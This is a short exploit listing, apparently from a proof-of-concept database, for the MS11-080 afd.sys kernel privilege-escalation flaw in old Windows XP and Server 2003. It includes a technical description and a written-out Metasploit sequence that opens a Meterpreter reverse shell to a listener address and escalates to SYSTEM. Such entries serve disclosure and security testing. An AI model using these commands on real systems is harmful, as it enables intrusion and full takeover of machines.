Timeline :
Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability the 2011-10-11
Metasploit PoC provided the 2012-10-02
PoC provided by :
Bo Zhou
Matteo Memelli
Spencer McIntyre
Reference(s) :
Affected version(s) :
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Tested on Windows XP Pro SP3 with :
N/A
Description :
This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it’s own token to avoid causing system instability.
Commands :
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit -j session -i 1 getuid sysinfo background use exploit/windows/local/ms11_080_afdjoinleaf set SESSION 1 exploit session -i 2 sysinfo getuid